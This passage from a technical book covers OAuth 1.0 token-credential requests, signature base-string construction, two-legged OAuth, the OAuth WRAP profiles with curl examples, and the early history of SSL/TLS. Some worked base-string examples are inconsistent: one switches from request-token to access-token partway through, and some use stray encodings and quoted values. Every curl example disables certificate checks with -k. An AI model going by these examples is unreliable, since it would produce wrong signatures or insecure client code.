At the end of this phase, the client has a new oauth_token and an oauth_verifier. Token-Credential Request Phase During the token-credential request phase, the client makes a direct HTTP POST or a GET request to the access token endpoint hosted at the resource server: POST /access_token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_token="bhgdjgdds", APPendix B OAuTH 1.0 337 oauth_signature_method="PLAINTEXT", oauth_verifier="dsdsdsds", oauth_signature="fdfsdfdfdfdfsfffdf" The authorization header in the request is constructed with the following parameters: • OAuth: The keyword used to identify the type of the authorization header. It must have the value OAuth. • realm: An identifier known to the resource server. Looking at the realm value, the resource server can decide how to authenticate the OAuth client. The value of realm here serves the same purpose as in HTTP Basic authentication. • oauth_consumer_key: A unique identifier issued to the OAuth client by the resource server. This key is associated with a secret key that is known to both the client and the resource server. • oauth_signature_method: The method used to generate the oauth_signature. This can be PLAINTEXT, HMAC-SHA1, or RSA-SHA1. PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA-SHA1 means an RSA private key has been used for the signature. The OAuth specification doesn’t mandate any signature method. The resource server can enforce any signature method, based on its requirements. • oauth_signature: The signature, which is calculated according to the method defined in oauth_signature_method. • oauth_token: The temporary-credential identifier returned in the temporary-credential request phase. • oauth_verifier: The verification code returned in the resource- owner authorization phase. After the resource server validates the access token request, it sends back the following response to the client: HTTP/1.1 200 OK Content-Type: application/x-www-form-urlencoded oauth_token=dsdsdsdsdweoio998s&oauth_token_secret=ioui789kjhk APPendix B OAuTH 1.0 338 Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. In future requests made by the client, this will be used to identify the value of oauth_token_secret to the resource server. This identifier links oauth_token_secret to the oauth_consumer_key. • oauth_token_secret: A shared secret generated by the resource server. The client will use this in future requests to generate the oauth_signature. To initiate the token-credential request phase, the client must have access to the oauth_token from the first phase and the oauth_verifier from the second phase. At the end of this phase, the client will have a new oauth_token and a new oauth_token_ secret. Invoking a Secured Business API with OAuth 1.0 At the end of the OAuth token dance, the following tokens should be retained at the OAuth client end: • oauth_consumer_key: An identifier generated by the resource server to uniquely identify the client. The client gets the oauth_ consumer_key at the time of registration with the resource server. The registration process is outside the scope of the OAuth specification. • oauth_consumer_secret: A shared secret generated by the resource server. The client will get the oauth_consumer_secret at the time of registration, with the resource server. The registration process is outside the scope of the OAuth specification. 
The oauth_consumer_ secret is never sent over the wire. • oauth_token: An identifier generated by the resource server at the end of the token-credential request phase. • oauth_token_secret: A shared secret generated by the resource server at the end of the token-credential request phase. APPendix B OAuTH 1.0 339 Following is a sample HTTP request to access a secured API with OAuth 1.0. Here we send an HTTP POST to the student API with one argument called name. In addition to the previously described parameters, it also has oauth_timestamp and oauth_nonce. An API gateway (or any kind of an interceptor) intercepts the request and talks to the token issuer to validate the authorization header. If all looks good, the API gateway routes the request to the business service (behind the API) and then sends back the corresponding response: POST /student?name=pavithra HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds ", oauth_token="dsdsdsdsdweoio998s", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1474343201", oauth_nonce="rerwerweJHKjhkdsjhkhj", oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D" Let’s examine the definition of the oauth_timestamp and oauth_nonce parameters: • oauth_timestamp: A positive integer that is the number of seconds counted since January 1, 1970, 00:00:00 GMT. • oauth_nonce: A randomly generated unique value added to the request by the client. It’s used to avoid replay attacks. The resource server must reject any request with a nonce that it has seen before. Demystifying oauth_signature Out of the three phases we discussed in the section “The Token Dance,” oauth_ signature is required in two: the temporary-credential request phase and the token- credential request phase. In addition, oauth_signature is required in all client requests to the protected resource or to the secured API. The OAuth specification defines three kinds of signature methods: PLAINTEXT, HMAC-SHA1, and RSA-SHA1. As explained earlier, PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA- SHA1 means an RSA private key has been used for the signature. APPendix B OAuTH 1.0 340 The OAuth specification doesn’t mandate any signature method. The resource server can enforce a signature method, based on its requirements. The challenge in each signature method is how to generate the base string to sign. Let’s start with the simplest case, PLAINTEXT (see Table B-1). Table B-1. Signature Calculation with the PLAINTEXT Signature Method Phase oauth_signature Temporary-credential request phase consumer_secret& Token-credential request phase consumer_secret&oauth_token_secret With the PLAINTEXT oauth_signature_method, the oauth_signature is the encoded consumer secret followed by &. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds, the value of oauth_signature is Ddedkljlj878dskjds&. In this case, TLS must be used to protect the secret key going over the wire. This calculation of oauth_signature with PLAINTEXT is valid only for the temporary-credential request phase. For the token-credential request phase, oauth_ signature also includes the shared token secret after the encoded consumer secret. 
For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds and the value of the shared token secret is ekhjkhkhrure, then the value of oauth_signature is Ddedkljlj878dskjds&ekhjkhkhrure. The shared token secret in this case is the oauth_token_secret returned in the temporary-credential request phase. For both HMAC-SHA1 and RSA-SHA1 signature methods, first you need to generate a base string for signing, which we discuss in the next section. Generating the Base String in Temporary-Credential Request Phase Let’s start with the temporary-credential request phase. The following is a sample OAuth request generated in this phase: POST /oauth/request-token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_signature_method="HMAC-SHA1", APPendix B OAuTH 1.0 341 oauth_callback="http://client.net/client_cb", oauth_signature="dsDSdsdsdsdddsdsdsd" Step 1: Get the uppercase value of the HTTP request header (GET or POST): POST Step 2: Get the value of the scheme and the HTTP host header in lowercase. If the port has a nondefault value, it needs to be included as well: http://server.com Step 3: Get the path and the query components in the request resource URI: /oauth/request-token Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks): oauth_consumer_key="dsdsddDdsdsds"& oauth_signature_method="HMAC-SHA1"& oauth_callback="http://client.net/client_cb" Step 5: Concatenate the outputs from steps 2 and 3: http://server.com/oauth/request-token Step 6: Concatenate the output from steps 5 and 4 with & (no line breaks): http://server.com/oauth/access-token& oauth_consumer_key="dsdsddDdsdsds"& oauth_signature_method="HMAC-SHA1"& oauth_callback="http://client.net/client_cb" Step 7: URL-encode the output from step 6 (no line breaks): http%3A%2F%2Fserver.com%2Foauth%2F access-token&%26%20oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_callback%3D%22http%3A%2F%2Fclient.net%2Fclient_cb%22 APPendix B OAuTH 1.0 342 Step 8: Concatenate the output from steps 1 and 7 with &. This produces the final base string to calculate the oauth_signature (no line breaks): POST&http%3A%2F%2Fserver.com%2Foauth%2F access-token&%26%20oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_callback%3D%22http%3A%2F%2Fclient.net%2Fclient_cb%22 Generating the Base String in Token Credential Request Phase Now, let’s see how to calculate the base string in the token-credential request phase. The following is a sample OAuth request generated in this phase: POST /access_token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_token="bhgdjgdds", oauth_signature_method="HMAC-SHA1", oauth_verifier="dsdsdsds", oauth_signature="fdfsdfdfdfdfsfffdf" Step 1: Get the uppercase value of the HTTP request header (GET or POST): POST Step 2: Get the value of the scheme and the HTTP host header in lowercase. 
If the port has a nondefault value, it needs to be included as well:

http://server.com

Step 3: Get the path and the query components in the request resource URI:

/oauth/access-token

Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks):

oauth_consumer_key="dsdsddDdsdsds"&
oauth_token="bhgdjgdds"&
oauth_signature_method="HMAC-SHA1"&
oauth_verifier="dsdsdsds"

Step 5: Concatenate the outputs from steps 2 and 3:

http://server.com/oauth/access-token

Step 6: Concatenate the outputs from steps 5 and 4 with & (no line breaks):

http://server.com/oauth/access-token&
oauth_consumer_key="dsdsddDdsdsds"&
oauth_token="bhgdjgdds"&
oauth_signature_method="HMAC-SHA1"&
oauth_verifier="dsdsdsds"

Step 7: URL-encode the output from step 6 (no line breaks):

http%3A%2F%2Fserver.com%2Foauth%2Faccess-token%26
oauth_consumer_key%3D%22dsdsddDdsdsds%22%26
oauth_token%3D%22bhgdjgdds%22%26
oauth_signature_method%3D%22HMAC-SHA1%22%26
oauth_verifier%3D%22dsdsdsds%22

Step 8: Concatenate the outputs from steps 1 and 7 with &. This produces the final base string used to calculate the oauth_signature (no line breaks):

POST&
http%3A%2F%2Fserver.com%2Foauth%2Faccess-token%26
oauth_consumer_key%3D%22dsdsddDdsdsds%22%26
oauth_token%3D%22bhgdjgdds%22%26
oauth_signature_method%3D%22HMAC-SHA1%22%26
oauth_verifier%3D%22dsdsdsds%22

Building the Signature

Once you've calculated the base string for each phase, the next step is to build the signature based on the signature method. For the temporary-credential request phase, if you use HMAC-SHA1 as the signature method, the signature is derived in the following manner:

oauth_signature = HMAC-SHA1(key, text)
oauth_signature = HMAC-SHA1(consumer_secret&, base-string)

For the token-credential request phase, the key also includes the shared token secret after the consumer secret. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds and the value of the shared token secret is ekhjkhkhrure, then the value of the key is Ddedkljlj878dskjds&ekhjkhkhrure. The shared token secret in this case is the oauth_token_secret returned in the temporary-credential request phase:

oauth_signature = HMAC-SHA1(consumer_secret&oauth_token_secret, base-string)

In either phase, if you want to use RSA-SHA1 as the oauth_signature_method, the OAuth client must register an RSA public key corresponding to its consumer key, at the resource server. For RSA-SHA1, you calculate the signature in the following manner, regardless of the phase:

oauth_signature = RSA-SHA1(RSA private key, base-string)

Generating the Base String in an API Call

In addition to the token dance, you also need to build the oauth_signature in each business API invocation. In the following sample request, the OAuth client invokes the student API with a query parameter. Let's see how to calculate the base string in this case:

POST /student?name=pavithra HTTP/1.1
Host: server.com
Content-Type: application/x-www-form-urlencoded
Authorization: OAuth realm="simple",
               oauth_consumer_key="dsdsddDdsdsds",
               oauth_token="dsdsdsdsdweoio998s",
               oauth_signature_method="HMAC-SHA1",
               oauth_timestamp="1474343201",
               oauth_nonce="rerwerweJHKjhkdsjhkhj",
               oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D"

Step 1: Get the uppercase value of the HTTP request method (GET or POST):

POST

Step 2: Get the value of the scheme and the HTTP host header in lowercase.
If the port has a nondefault value, it needs to be included as well:

http://server.com

Step 3: Get the path and the query components in the request resource URI:

/student?name=pavithra

Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks):

oauth_consumer_key="dsdsddDdsdsds"&
oauth_token="dsdsdsdsdweoio998s"&
oauth_signature_method="HMAC-SHA1"&
oauth_timestamp="1474343201"&
oauth_nonce="rerwerweJHKjhkdsjhkhj"

Step 5: Concatenate the outputs from steps 2 and 3 (no line breaks):

http://server.com/student?name=pavithra

Step 6: Concatenate the outputs from steps 5 and 4 with & (no line breaks):

http://server.com/student?name=pavithra&
oauth_consumer_key="dsdsddDdsdsds"&
oauth_token="dsdsdsdsdweoio998s"&
oauth_signature_method="HMAC-SHA1"&
oauth_timestamp="1474343201"&
oauth_nonce="rerwerweJHKjhkdsjhkhj"

Step 7: URL-encode the output from step 6 (no line breaks):

http%3A%2F%2Fserver.com%2Fstudent%3Fname%3Dpavithra%26
oauth_consumer_key%3D%22dsdsddDdsdsds%22%26
oauth_token%3D%22dsdsdsdsdweoio998s%22%26
oauth_signature_method%3D%22HMAC-SHA1%22%26
oauth_timestamp%3D%221474343201%22%26
oauth_nonce%3D%22rerwerweJHKjhkdsjhkhj%22

Step 8: Concatenate the outputs from steps 1 and 7 with &. This produces the final base string used to calculate the oauth_signature (no line breaks):

POST&
http%3A%2F%2Fserver.com%2Fstudent%3Fname%3Dpavithra%26
oauth_consumer_key%3D%22dsdsddDdsdsds%22%26
oauth_token%3D%22dsdsdsdsdweoio998s%22%26
oauth_signature_method%3D%22HMAC-SHA1%22%26
oauth_timestamp%3D%221474343201%22%26
oauth_nonce%3D%22rerwerweJHKjhkdsjhkhj%22

Once you have the base string, the OAuth signature is calculated in the following manner with the HMAC-SHA1 and RSA-SHA1 signature methods. The value of oauth_token_secret is from the token-credential request phase:

oauth_signature = HMAC-SHA1(consumer_secret&oauth_token_secret, base-string)
oauth_signature = RSA-SHA1(RSA private key, base-string)

Three-Legged OAuth vs. Two-Legged OAuth

The OAuth flow discussed so far involves three parties: the resource owner, the client, and the resource server. The client accesses a resource hosted in the resource server on behalf of the resource owner. This is the most common pattern in OAuth, and it's also known as three-legged OAuth (three parties involved). In two-legged OAuth, you have only two parties: the client becomes the resource owner. There is no access delegation in two-legged OAuth.

Note: Two-legged OAuth never made it to the IETF. The initial draft specification is available at http://oauth.googlecode.com/svn/spec/ext/consumer_request/1.0/drafts/2/spec.html.

If the same student API discussed earlier is secured with two-legged OAuth, the request from the client looks like the following. The value of oauth_token is an empty string. There is no token dance in two-legged OAuth. You only need oauth_consumer_key and consumer_secret. The HMAC-SHA1 signature is generated using consumer_secret as the key:

POST /student?name=pavithra HTTP/1.1
Host: server.com
Content-Type: application/x-www-form-urlencoded
Authorization: OAuth realm="simple",
               oauth_consumer_key="dsdsddDdsdsds",
               oauth_token="",
               oauth_signature_method="HMAC-SHA1",
               oauth_timestamp="1474343201",
               oauth_nonce="rerwerweJHKjhkdsjhkhj",
               oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D"

Note: In both HTTP Basic authentication and two-legged OAuth, the resource owner acts as the client and directly invokes the API.
With HTTP Basic authentication, you pass the credentials over the wire; this must be over TLS. With two-legged OAuth, you never pass the consumer_secret over the wire, so it need not be on TLS. HTTP digest authentication looks very similar to two-legged OAuth. in both cases, you never pass credentials over the wire. The difference is that HTTP digest authentication authenticates the user, whereas two-legged OAuth authenticates the application on behalf of the resource owner. A given resource owner can own multiple applications, and each application can have its own consumer key and consumer secret. OAuth WRAP In November 2009, a new draft specification for access delegation called Web Resource Authorization Profiles (WRAP) was proposed, built on top of the OAuth 1.0 model. WRAP was later deprecated in favor of OAuth 2.0. APPendix B OAuTH 1.0 348 Note The initial draft of the WRAP profile submitted to the ieTF is available at http://tools.ietf.org/html/draft-hardt-oauth-01. Unlike OAuth 1.0, WRAP didn’t depend on a signature scheme. At a high level, the user experience was the same as in OAuth 1.0, but WRAP introduced a new component into the access delegation flow: the authorization server. Unlike in OAuth 1.0, all the communications with respect to obtaining a token now happens between the client and the authorization server (not with the resource server). The client first redirects the user to the authorization server with its consumer key and the callback URL. Once the user authorized the access rights to the client, the user is redirected back to the callback URL with a verification code. Then the client has to do a direct call to the access token endpoint of the authorization server with the verification code to get the access token. Thereafter, the client only needs to include the access token in all API calls (all API calls must be on TLS): https://friendfeed-api.com/v2/feed/home?wrap_access_token=dsdsdrwerwr Note in november 2009, Facebook joined the Open Web Foundation, together with Microsoft, Google, Yahoo!, and many others, with a commitment to support open standards for web authentication. Keeping that promise, in december 2009, Facebook added OAuth WRAP support to FriendFeed, which it had acquired a few months earlier. OAuth WRAP was one of the initial steps toward OAuth 2.0. WRAP introduced two types of profiles for acquiring an access token: autonomous client profiles and user delegation profiles. In autonomous client profiles, the client becomes the resource owner, or the client is acting on behalf of itself. In other words, the resource owner is the one who accesses the resource. This is equivalent to the two- legged OAuth model in OAuth 1.0. In user delegation profiles, the client acts on behalf of the resource owner. OAuth 1.0 didn’t have this profile concept, and was limited to a single flow. This extensibility introduced by OAuth WRAP later became a key part of OAuth 2.0. APPendix B OAuTH 1.0 349 Client Account and Password Profile The OAuth WRAP specification introduced two autonomous client profiles: the Client Account and Password Profile and the Assertion Profile. The Client Account and Password Profile uses the client’s or the resource owner’s credentials at the authorization server to obtain an access token. This pattern is mostly used for server-to-server authentication where no end user is involved. 
The following cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_name is the username, wrap_password is the password corresponding to the username, and wrap_scope is the expected level of access required by the client. wrap_scope is an optional parameter: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_name=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token This returns wrap_access_token, wrap_refresh_token, and wrap_access_token_ expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. OAuth WRAP introduced for the first time this token-refreshing functionality. The access token refresh request only needs wrap_refresh_token as a parameter, as shown next, and it returns a new wrap_access_token. It doesn’t return a new wrap_refresh_token. The same wrap_refresh_token obtained in the first access token request can be used to refresh subsequent access tokens: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_refresh_token=Xkjk78iuiuh876jhhkwkjhewew" https://authorization-server/wrap/token APPendix B OAuTH 1.0 350 Assertion Profile The Assertion Profile is another profile introduced by OAuth WRAP that falls under the autonomous client profiles. This assumes that the client somehow obtains an assertion—say, for example, a SAML token—and uses it to acquire a wrap_access_token. The following example cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_assertion_format is the type of the assertion included in the request in a way known to the authorization server, wrap_assertion is the encoded assertion, and wrap_scope is the expected level of access required by the client. wrap_scope is an optional parameter: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_assertion_format=saml20& wrap_assertion=encoded-assertion& wrap_scope=read_profile" https://authorization-server/wrap/token The response is the same as in the Client Account and Password Profile, except that in the Assertion Profile, there is no wrap_refresh_token. Username and Password Profile The WRAP user delegation profiles introduced three profiles: the Username and Password Profile, the Web App Profile, and the Rich App Profile. The Username and Password Profile is mostly recommended for installed trusted applications. The application is the client, and the end user or the resource owner must provide their username and password to the application. Then the application exchanges the username and password for an access token and stores the access token in the application. 
The following cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with four attributes: wrap_client_id is an identifier for the application, wrap_username is the username of the end user, wrap_password is the APPendix B OAuTH 1.0 351 password corresponding to the username, and wrap_scope is the expected level of access required by the client (wrap_scope is an optional parameter): \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=app1& wrap_username=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token This returns wrap_access_token and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. If the authorization server detects any malicious access patterns, then instead of sending wrap_access_token to the client application, it returns a wrap_verification_url. It’s the responsibility of the client application to load this URL into the user’s browser or advise them to visit that URL. Once the user has completed that step, the user must indicate to the client application that verification is complete. Then the client application can initiate the token request once again. Instead of sending a verification URL, the authorization server can also enforce a CAPTCHA verification through the client application. There the authorization server sends back a wrap_captcha_url, which points to the location where the client application can load the CAPTCHA. Once it’s loaded and has the response from the end user, the client application must POST it back to the authorization server along with the token request: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_captcha_url=url-encoded-captcha-url& wrap_captch_solution-solution& wrap_client_id=app1& wrap_username=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token APPendix B OAuTH 1.0 352 Web App Profile The Web App Profile defined under the WRAP user delegation profiles is mostly recommended for web applications, where the web application must access a resource belonging to an end user on his or her behalf. The web application follows a two-step process to acquire an access token: it gets a verification code from the authorization server and then exchanges that for an access token. The end user must initiate the first step by visiting the client web application. Then the user is redirected to the authorization server. The following example shows how the user is redirected to the authorization server with appropriate WRAP parameters: https://authorization-server/wrap/authorize? wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_callback=https%3A%2F%2Fmycallback& wrap_client_state=client-state& wrap_scope=read_profile wrap_client_id is an identifier for the client web application. wrap_callback is the URL where the user is redirected after a successful authentication at the authorization server. Both wrap_client_state and wrap_scope are optional parameters. Any value in wrap_client_state must be returned back to the client web application. After the end user’s approval, a wrap_verification_code and other related parameters are returned to the callback URL associated with the client web application as query parameters. 
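For illustration, that redirect back to the client web application's callback URL might look like the following (the values are the hypothetical ones used in this example, and wrap_client_state appears only if the client included it in the authorization request):

https://mycallback?wrap_verification_code=dsadkjljljrrer&wrap_client_state=client-state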
The next step is to exchange this verification code to an access token: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca & wrap_client_secret=weqeKJHjhkhkihjk& wrap_verification_code=dsadkjljljrrer& wrap_callback=https://mycallback" https://authorization-server/wrap/token This cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with four attributes: wrap_client_id is an identifier for the application, wrap_client_secret is the password corresponding to wrap_client_id, wrap_verification_code is the verification code returned in the previous step, and wrap_callback is the callback URL where the verification code was sent. This returns APPendix B OAuTH 1.0 353 wrap_access_token, wrap_refresh_token, and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. Rich App Profile The Rich App Profile defined under the WRAP user delegation profiles is most commonly used in scenarios where the OAuth client application is an installed application that can also work with a browser. Hybrid mobile apps are the best example. The protocol flow is very similar to that of the Web App Profile. The rich client application follows a two-step process to acquire an access token: it gets a verification code from the authorization server and then exchanges that for an access token. The end user must initiate the first step by visiting the rich client application. Then the application spawns a browser and redirects the user to the authorization server: https://authorization-server/wrap/authorize? wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_callback=https%3A%2F%2Fmycallback& wrap_client_state=client-state& wrap_scope=read_profile wrap_client_id is an identifier for the rich client application. wrap_callback is the URL where the user is redirected after a successful authentication at the authorization server. Both wrap_client_state and wrap_scope are optional parameters. Any value in wrap_client_state is returned back to the callback URL. After the end user’s approval, a wrap_verification_code is returned to the rich client application. The next step is to exchange this verification code for an access token: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_verification_code=dsadkjljljrrer& wrap_callback=https://mycallback" https://authorization-server/wrap/token APPendix B OAuTH 1.0 354 This cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_client_id is an identifier for the application, wrap_verification_code is the verification code returned in the previous step, and wrap_callback is the callback URL where the verification code was sent. This returns wrap_access_token, wrap_refresh_token, and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. Unlike in the Web App Profile, the Rich App Profile doesn’t need to send wrap_client_secret in the access token request. Accessing a WRAP-Protected API All the previous profiles talk about how to get an access token. 
Once you have the access token, the rest of the flow is independent of the WRAP profile. The following cURL command shows how to access a WRAP-protected resource or an API, and it must happen over TLS: \> curl –H "Authorization: WRAP access_token=cac93e1d29e45bf6d84073dbfb460" https://localhost:8080/recipe WRAP to OAuth 2.0 OAuth WRAP was able to sort out many of the limitations and drawbacks found in OAuth 1.0: primarily, extensibility. OAuth 1.0 is a concrete protocol for identity delegation that has its roots in Flickr Authentication, Google AuthSub, and Yahoo! BBAuth. Another key difference between OAuth 1.0 and WRAP is the dependency on signatures: OAuth WRAP eliminated the need for signatures and mandated using TLS for all types of communications. OAuth 2.0 is a big step forward from OAuth WRAP. It further improved the extensibility features introduced in OAuth WRAP and introduced two major extension points: grant types and token types. APPendix B OAuTH 1.0 355 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_18 APPENDIX C How Transport Layer Security Works? After the exposure of certain secret operations carried out by the National Security Agency (NSA) of the United States, by its former contractor, Edward Snowden, most of the governments, corporations, and even individuals started to think more about security. Edward Snowden is a traitor for some while a whistle-blower for others. The Washington Post newspaper published details from a document revealed by Edward Snowden on October 30, 2013. This was a disturbing news for two Silicon Valley tech giants, Google and Yahoo!. This highly confidential document revealed how NSA intercepted communication links between data centers of Google and Yahoo! to carry out a massive surveillance on its hundreds of millions of users. Further, according to the document, NSA sends millions of records every day from the Yahoo! and Google internal networks to data warehouses at the agency’s headquarters in Fort Meade, Md. After that, field collectors process these data records to extract out metadata, which indicate who sent or received emails and when, as well as the content such as text, audio, and video.1 How is this possible? How come an intruder (in this case, it’s the government) intercepts the communication channels between two data centers and gets access to the data? Even though Google used a secured communication channel from the user’s browser to the Google front-end servers, from there onward, and between the data centers, the communication was in cleartext. As a response to this incident, Google started securing all its communication links between data centers with encryption. Transport Layer Security (TLS) plays a major role in securing data transferred over 1 NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say, www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo- google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3- 8b74-d89d714ca4dd_story.html 356 communication links. In fact, Google is one of the first out of all tech giants to realize the value of TLS. Google made TLS the default setting in Gmail in January 2010 to secure all Gmail communications and four months later introduced an encrypted search service located at https://encrypted.google.com. 
In October 2011, Google further enhanced its encrypted search and made google.com available on HTTPS, and all Google search queries and the result pages were delivered over HTTPS. HTTPS is in fact the HTTP over TLS. In addition to establishing a protected communication channel between the client and the server, TLS also allows both the parties to identify each other. In the most popular form of TLS, which everyone knows and uses in day-to-day life on the Internet, only the server authenticates to the client—this is also known as one-way TLS. In other words, the client can identify exactly the server it communicates with. This is done by observing and matching the server’s certificate with the server URL, which the user hits on the browser. As we proceed in this appendix, we will further discuss how exactly this is done in detail. In contrast to one-way TLS, mutual authentication identifies both the parties—the client and the server. The client knows exactly the server it communicates with, and the server knows who the client is. The Evolution of Transport Layer Security (TLS) TLS has its roots in SSL (Secure Sockets Layer). Netscape Communications (then Mosaic Communications) introduced SSL in 1994 to build a secured channel between the Netscape browser and the web server it connects to. This was an important need at that time, just prior to the dot-com bubble.2 The SSL 1.0 specification was never released to the public, because it was heavily criticized for the weak cryptographic algorithms that were used. In February 1995, Netscape released the SSL 2.0 specification with many improvements.3 Most of its design was done by Kipp Hickman, with much less participation from the public community. Even though it had its own vulnerabilities, it 2 Dot-com bubble refers to the rapid rise in equity markets fueled by investments in Internet- based companies. During the dot-com bubble of the late 1990s, the value of equity markets grew exponentially, with the technology-dominated Nasdaq index rising from under 1,000 to 5,000 between 1995 and 2000. 3 Adam Shostack, the well-known author of The New School of Information Security, provides an overview of SSL 2.0 at www.homeport.org/~adam/ssl.html Appendix C How TrAnsporT LAyer seCuriTy works? 357 earned the trust and respect of the public as a strong protocol. The very first deployment of SSL 2.0 was in Netscape Navigator 1.1. In late 1995, Ian Goldberg and David Wagner discovered a vulnerability in the random number generation logic in SSL 2.0.4 Mostly due to US export regulations, Netscape had to weaken its encryption scheme to use 40-bit long keys. This limited all possible key combinations to a million million, which were tried by a set of researchers in 30 hours with many spare CPU cycles; they were able to recover the encrypted data. SSL 2.0 was completely under the control of Netscape and was developed with no or minimal inputs from others. This encouraged many other vendors including Microsoft to come up with their own security implementations. As a result, Microsoft developed its own variant of SSL in 1995, called Private Communication Technology (PCT).5 PCT fixed many security vulnerabilities uncovered in SSL 2.0 and simplified the SSL handshake with fewer round trips required in establishing a connection. Among the differences between SSL 2.0 and PCT, the non-encrypted operational mode introduced in PCT was quite prominent. With non-encrypted operational mode, PCT only provides authentication—no data encryption. 
As discussed before, due to the US export regulation laws, SSL 2.0 had to use weak cryptographic keys for encryption. Even though the regulations did not mandate to use weak cryptographic keys for authentication, SSL 2.0 used the same weak cryptographic keys used for encryption, also for authentication. PCT fixed this limitation in SSL 2.0 by introducing a separate strong key for authentication. Netscape released SSL 3.0 in 1996 having Paul Kocher as the key architect. This was after an attempt to introduce SSL 2.1 as a fix for the SSL 2.0. But it never went pass the draft stage, and Netscape decided it was the time to design everything from ground up. In fact, Netscape hired Paul Kocher to work with its own Phil Karlton and Allan Freier to build SSL 3.0 from scratch. SSL 3.0 introduced a new specification language as well as a new record type and a new data encoding technique, which made it incompatible with the SSL 2.0. It fixed issues in its predecessor, introduced due to MD5 hashing. The new version used a combination of the MD5 and SHA-1 algorithms to build a hybrid hash. SSL 3.0 was the most stable of all. Even some of the issues found in Microsoft PCT were fixed in SSL 3.0, and it further added a set of new features that were not in PCT. In 1996, 4 Ian Goldberg and David Wagner, “Randomness and the Netscape Browser: How Secure Is the World Wide Web?” www.cs.berkeley.edu/~daw/papers/ddj-netscape.html, January 1996. 5 Microsoft proposed PCT to the IETF in October 1995: http://tools.ietf.org/html/draft- benaloh-pct-00. This was later superseded by SSL 3.0 and TLS. Appendix C How TrAnsporT LAyer seCuriTy works? 358 Microsoft came up with a new proposal to merge SSL 3.0 and its own SSL variant PCT 2.0 to build a new standard called Secure Transport Layer Protocol (STLP).6 Due to the interest shown by many vendors in solving the same problem in different ways, in 1996 the IETF initiated the Transport Layer Security working group to standardize all vendor-specific implementations. All the major vendors, including Netscape and Microsoft, met under the chairmanship of Bruce Schneier in a series of IETF meetings to decide the future of TLS. TLS 1.0 (RFC 2246) was the result; it was released by the IETF in January 1999. The differences between TLS 1.0 and SSL 3.0 aren’t dramatic, but they’re significant enough that TLS 1.0 and SSL 3.0 don’t interoperate. TLS 1.0 was quite stable and stayed unchanged for seven years, until 2006. In April 2006, RFC 4346 introduced TLS 1.1, which made few major changes to TLS 1.0. Two years later, RFC 5246 introduced TLS 1.2, and in August 2018, almost 10 years after TLS 1.2, RFC 8446 introduced TLS 1.3. Transmission Control Protocol (TCP) Understanding how Transmission Control Protocol (TCP) works provides a good background to understand how TLS works. TCP is a layer of abstraction of a reliable network running over an unreliable channel. IP (Internet Protocol) provides host-to- host routing and addressing. TCP/IP is collectively known as the Internet Protocol Suite, which was initially proposed by Vint Cerf and Bob Kahn.7 The original proposal became the RFC 